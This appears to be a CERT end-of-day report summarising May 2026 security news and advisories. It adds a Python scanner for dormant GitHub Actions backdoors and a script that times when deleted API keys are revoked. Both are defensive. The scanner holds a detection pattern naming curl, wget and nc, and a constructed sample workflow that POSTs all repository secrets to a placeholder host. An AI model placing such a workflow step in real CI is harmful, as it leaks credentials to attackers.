End-of-Day report
Timeframe: Thursday 21-05-2026 18:00 - Friday 22-05-2026 18:00
Handler: Guenes Holler
Co-Handler: Michael Schlagenhaufer
News
Qilin ransomware uses initial access from the ZipLine campaign - DACH recruiting domains in focus
We have indications that the ransomware group Qilin is acquiring initial access from actors behind the ZipLine phishing campaign and reusing it for its own encryption and extortion operations. In Austria we already have confirmed cases. [..] In the DACH region we are currently seeing mainly lure domains with a recruiting theme.
https://www.cert.at/de/aktuelles/2026/5/zipline-qilin-raas
A hacker group is poisoning open source code at an unprecedented scale
GitHub is just the latest victim of TeamPCP, a gang that has carried out a spree of software supply chain attacks. [..] Amid an epidemic of supply chain attacks like the ones TeamPCP has unleashed, Socket's Burckhardt says open-source users will need to take trust-but-verify measures, like analyzing updates for malware before rolling them out across a network, as well as the kind of "cool-down" period that Read recommends before downloading and running code.
https://arstechnica.com/information-technology/2026/05/a-hacker-group-is-poisoning-open-source-code-at-an-unprecedented-scale/
Megalodon: Mass GitHub Repo Backdooring via CI Workflows
On May 18, 2026, an automated campaign codenamed megalodon pushed 5,718 malicious commits to 5,561 GitHub repositories in a six-hour window. [..] 5,700+ commits in six hours, 5,561 repositories, one payload: replace a GitHub Actions workflow with a dormant secret exfiltration backdoor. The workflow_dispatch trigger design means these backdoors sit silent until activated, creating no visible CI runs.
https://safedep.io/megalodon-mass-github-repo-backdooring-ci-workflows
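A triage check for the pattern described above, added here as an example (it is not SafeDep's tooling and the excerpt does not give the exact payload): a workflow whose only triggers are manual ones produces no CI run on its own, so a scan of .github/workflows should flag files that combine a manual-only trigger with a reference to secrets and a tool able to ship them off the runner. The two workflow files below are constructed, the host example.invalid is a placeholder, and the indicator lists are assumptions.

```python
"""Heuristic scan for dormant, manually triggered GitHub Actions workflows
that read secrets and reach out to the network.

Added example for this report; not SafeDep's code. The two sample workflows
are constructed and the exfiltration host example.invalid is a placeholder."""
import re
import sys
from pathlib import Path

# Triggers that only fire when somebody deliberately invokes them, so a workflow
# using nothing else never shows up as a CI run. repository_dispatch is added
# as an assumption: it can also be fired from outside through the API.
MANUAL_TRIGGERS = {"workflow_dispatch", "repository_dispatch"}

# Indicators (assumed): a secrets reference, and a tool that can POST it somewhere.
SECRET_REF = re.compile(r"\$\{\{\s*(secrets\.[A-Za-z0-9_]+|toJSON\(\s*secrets\s*\))\s*\}\}")
NET_TOOL = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|Invoke-RestMethod)\b", re.I)


def parse_triggers(text):
    """Return the trigger names under the top-level `on:` key.

    Handles `on: push`, `on: [push, pull_request]` and the block form with
    nested options, without needing a YAML library."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"^on:\s*(.*?)\s*(?:#.*)?$", line)
        if not m:
            continue
        inline = m.group(1)
        if inline.startswith("["):
            return {t.strip().strip("'\"") for t in inline.strip("[]").split(",") if t.strip()}
        if inline:
            return {inline.strip("'\"")}
        block = []
        for nxt in lines[i + 1:]:
            if nxt.strip() == "" or nxt.lstrip().startswith("#"):
                continue
            if not nxt.startswith((" ", "\t")):
                break  # next top-level key ends the on: block
            block.append(nxt)
        if not block:
            return set()
        depth = min(len(b) - len(b.lstrip()) for b in block)
        names = set()
        for b in block:
            if len(b) - len(b.lstrip()) != depth:
                continue  # nested options such as inputs: or branches:
            km = re.match(r"^\s*(?:-\s*)?([A-Za-z_]+)\s*:?", b)
            if km:
                names.add(km.group(1))
        return names
    return set()


def assess_workflow(text):
    """Combine the three indicators into one verdict for a workflow file."""
    triggers = parse_triggers(text)
    manual_only = bool(triggers) and triggers <= MANUAL_TRIGGERS
    reads_secrets = SECRET_REF.search(text) is not None
    has_net_tool = NET_TOOL.search(text) is not None
    return {
        "triggers": sorted(triggers),
        "manual_only": manual_only,
        "reads_secrets": reads_secrets,
        "has_net_tool": has_net_tool,
        "suspicious": manual_only and reads_secrets and has_net_tool,
    }


def scan_workflows(repo_root):
    """Assess every workflow under .github/workflows of a checked-out repository."""
    results = {}
    for path in Path(repo_root, ".github", "workflows").glob("*.y*ml"):
        results[str(path)] = assess_workflow(path.read_text(encoding="utf-8", errors="replace"))
    return results


# Constructed sample: normal release workflow, uses a secret but runs on push/PR.
BENIGN_WORKFLOW = """name: Release
on:
  push:
    branches: [main]
  pull_request:
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

# Constructed sample: dormant backdoor, manual trigger only, dumps all secrets.
DORMANT_EXFIL_WORKFLOW = """name: CI
on:
  workflow_dispatch:
    inputs:
      target:
        description: unused
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -s -X POST -d "${{ toJSON(secrets) }}" https://example.invalid/collect
"""

if __name__ == "__main__":
    if len(sys.argv) == 2:
        for path, verdict in scan_workflows(sys.argv[1]).items():
            print(("SUSPICIOUS " if verdict["suspicious"] else "ok         ") + path, verdict["triggers"])
    else:
        print("benign :", assess_workflow(BENIGN_WORKFLOW))
        print("dormant:", assess_workflow(DORMANT_EXFIL_WORKFLOW))
```

Run it with a repository path to scan a checkout, or without arguments to see the two constructed samples assessed. It is a heuristic: a legitimate deploy workflow that is run by hand and posts to an internal endpoint will also match, so treat hits as review candidates, and compare flagged files against their git history for the replacement commit the report describes.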
Drupal: Critical SQL injection flaw now targeted in attacks
Drupal is warning that hackers are attempting to exploit a "highly critical" SQL injection vulnerability announced earlier this week.
https://www.bleepingcomputer.com/news/security/drupal-critical-sql-injection-flaw-now-targeted-in-attacks/
Google API keys keep working after you delete them long enough to be exploited
When you delete a Google API key, it says it's immediately deleted. Our testing says ~23 minutes. During that window, an attacker with a leaked key keeps access to your data and enabled APIs (including Gemini). You have no way to revoke it faster or confirm when it stops working. Google closed our report as "won't fix".
https://www.aikido.dev/blog/google-api-keys-deletion
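Since the post says there is no way to confirm when a deleted key stops working, the practical check is to measure it yourself. The following is an added example (not Aikido's code): immediately after deleting a leaked key, poll an API it was enabled for until the backend rejects it, and log how long it stayed live. The probe URL (the Gemini model list) and the treatment of a non-429 4xx status as rejection are assumptions; 429 and 5xx are treated as inconclusive and polling continues.

```python
"""Measure how long a deleted Google API key keeps being accepted.

Added example for this report, not Aikido's tooling. Start it right after
deleting the key. The probe endpoint and the assumption that a deleted or
invalid key is answered with a 4xx status are assumptions, not facts from
the post."""
import sys
import time
import urllib.error
import urllib.request

# Assumed: an endpoint of an API the key was enabled for (Gemini model listing).
PROBE_URL = "https://generativelanguage.googleapis.com/v1beta/models?key={key}"


def http_status(url):
    """GET the URL and return the HTTP status, including for 4xx/5xx answers."""
    try:
        with urllib.request.urlopen(url, timeout=15) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def wait_until_revoked(key, probe=http_status, interval=30.0, max_wait=3600.0,
                       clock=time.monotonic, sleep=time.sleep):
    """Poll with the deleted key until it is rejected or max_wait elapses.

    Returns (revoked, seconds_elapsed, samples); samples is a list of
    (seconds_since_start, http_status). A 2xx means the deleted key still
    works. A 4xx other than 429 is taken as rejection (assumption); 429 and
    5xx are inconclusive, so polling continues. probe, clock and sleep are
    injectable so the loop can be exercised without network access."""
    start = clock()
    samples = []
    while True:
        status = probe(PROBE_URL.format(key=key))
        elapsed = clock() - start
        samples.append((round(elapsed, 1), status))
        if 400 <= status < 500 and status != 429:
            return True, elapsed, samples
        if elapsed >= max_wait:
            return False, elapsed, samples
        sleep(interval)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: probe_deleted_key.py <deleted-api-key>")
    revoked, secs, log = wait_until_revoked(sys.argv[1])
    for t, code in log:
        print(f"+{t:7.1f}s  HTTP {code}")
    print(("rejected after %.0f s" if revoked else "still accepted after %.0f s") % secs)
```

Until the loop reports rejection, treat the key as live: anything it could reach (billing, data, the enabled APIs) is still exposed for that window, so containment has to come from elsewhere (API restrictions on the key, quota, or the data behind it) rather than from the delete button.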
Paved With Intent: ROADtools and Nation-State Tactics in the Cloud
Open-source framework ROADtools is being misused by threat actors for cloud intrusions. [..] ROADtools is an open-source framework written in Python and built for red-teaming and research. It primarily targets the identity and authentication layers of Azure, and focuses on how accounts, applications and tokens operate in tenants.
https://unit42.paloaltonetworks.com/roadtools-cloud-attacks/
CISA to allow researchers to report vulnerabilities to exploited bugs catalog
The Cybersecurity and Infrastructure Security Agency (CISA) announced the creation of a nomination form on Thursday that they said enables "researchers, vendors, and industry partners" to report bugs that need to be added to the Known Exploited Vulnerabilities catalog.
https://therecord.media/cisa-to-allow-researchers-to-report-vulnerabilities-kev
Vulnerabilities
Ubiquiti patches three max severity UniFi OS vulnerabilities
Ubiquiti has released security updates to patch three maximum severity vulnerabilities in UniFi OS that can be exploited by remote attackers without privileges. [..]
https://www.bleepingcomputer.com/news/security/ubiquiti-patches-three-max-severity-unifi-os-vulnerabilities/
Trend Micro Apex One and Langflow: warning of ongoing attacks
The vulnerability under attack in Trend Micro's Apex One is closed by the May updates, which the vendor released on Thursday of this week. [..] In Langflow's case it is a chained vulnerability that enables account takeover and remote code execution.
https://www.heise.de/news/Schwachstellen-in-Trend-Micro-Apex-One-und-Langflow-unter-Beschuss-11303311.html
Notepad++: update fixes vulnerability in the installer
Notepad++ closes a security vulnerability in the installer in the new version 8.9.6. The risk assessment is not yet clear; a listed CVE entry has not yet been published.
https://www.heise.de/news/Notepad-Update-bessert-Schwachstelle-im-Installer-aus-11303525.html
FatGid - FreeBSD 14.x kernel LPE
A kernel stack buffer overflow exists in the setcred(2) system call introduced in FreeBSD 14.x. The overflow occurs before any privilege check, allowing any unprivileged local user to trigger arbitrary behaviour ranging from a kernel panic to full local privilege escalation. [..] The FreeBSD Security Team published FreeBSD-SA-26:18.setcred on 2026-05-21 with the assigned identifier CVE-2026-45250. Patches landed across all supported branches on 2026-05-20.
https://fatgid.io/
LWN: Security updates for Friday
https://lwn.net/Articles/1074040/
Tenable: [R1] Sensor Proxy Version 1.4.0 Fixes Multiple Vulnerabilities
https://www.tenable.com/security/tns-2026-15
Openwall: CVE-2026-47243: Kata Containers guest-root to host-root escape via virtiofs
https://www.openwall.com/lists/oss-security/2026/05/21/14